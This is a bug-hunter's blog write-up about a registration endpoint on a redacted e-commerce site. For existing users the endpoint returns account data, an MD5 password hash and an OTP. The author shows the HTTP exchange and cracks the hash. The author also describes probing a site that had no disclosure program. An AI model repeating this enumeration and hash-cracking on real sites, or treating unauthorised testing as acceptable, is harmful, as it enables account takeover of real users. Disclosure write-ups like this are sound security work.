Interesting Account Takeover Bugs
In this article we are going to see an interesting bug which is not generally seen in the wild.
I was working on an e-commerce target which didn’t have any Bug Bounty Program or Vulnerability Disclosure Policy. But luckily I saw the company has recently applied a patch and it was showing on the openbugbounty.org page.
So as usual I started the recon and soon I collected all the subdomains and company’s assets including email and revenue info. I found some 2 Reflected Cross Site Scripting bugs and soon I reported them and still I am waiting, without any hope obviously, for the reply from them. Anyway, coming to the topic.
There was user account registration and login as almost all websites do.
So I tried to register an account. As soon as I entered my email id it send a POST request to the application to check whether there exist any email or not.
POST /apicallback/webUsers/checkRegistered/ HTTP/2
Host: www.redacted.com
...
...{
"email":"thisistest123@gmail.com",
"keepLogged":true
}
If there is not any user already registered with that email then the reponse was
HTTP/2 200 OK
Date: Fri, 04 Nov 2022 11:00:04 GMT
Content-Type: text/html; charset=UTF-8
...
...{"error":"0","errorMsg":"email id not registered"}
And after the response arrived in the browser user is redirected to the password page.
But if there is any account already registered then it sends all the information of the account like email, date of registration, cart id, what items in the cart and many more including the md5 password hash.
HTTP/2 200 OK
Date: Fri, 04 Nov 2022 11:04:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 766
...
...{"entity_id":"714467","entity_type_id":"1","attribute_set_id":"0","website_id":"1","email":"thisistest123@gmail.com","group_id":"1","store_id":"1","created_at":"2022-11-04 08:27:51","updated_at":"2022-11-04 08:27:49","is_active":"1","batch_id":"3","created_in":"Default Store View","password_hash":"482c811da5d5b4bc6d497ffa98491e38","is_subscribe":1,"addresses":[],"menu_data":[{"page_id":3,"title":"ABOUT US"},{"page_id":4,"title":"CONTACT US"},{"page_id":6,"title":"SHIPPING"},{"page_id":7,"title":"RETURNS"},{"page_id":8,"title":"HELP"},{"page_id":9,"title":"TERMS"},{"page_id":10,"title":"PRIVACY"},{"page_id":11,"title":"CAREERS"}],"caching_time":900,"image_caching_time":90000,"Cards":[],"cardsCount":0,"error":"1","errorMsg":"User already exist","otp":938061}
Here is the acutal image.
If you look closely to the response you will see.
So I instantly copied the md5 password hash and decoded it.
And retrieved the password as password123
I instantly made POC and reported to the company.
If you enjoyed reading this article then do checkout our other writeups on the related topics.
Let’s get connected
Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec
If you want to appreciate and support my work here you go…
Thanks for reading.
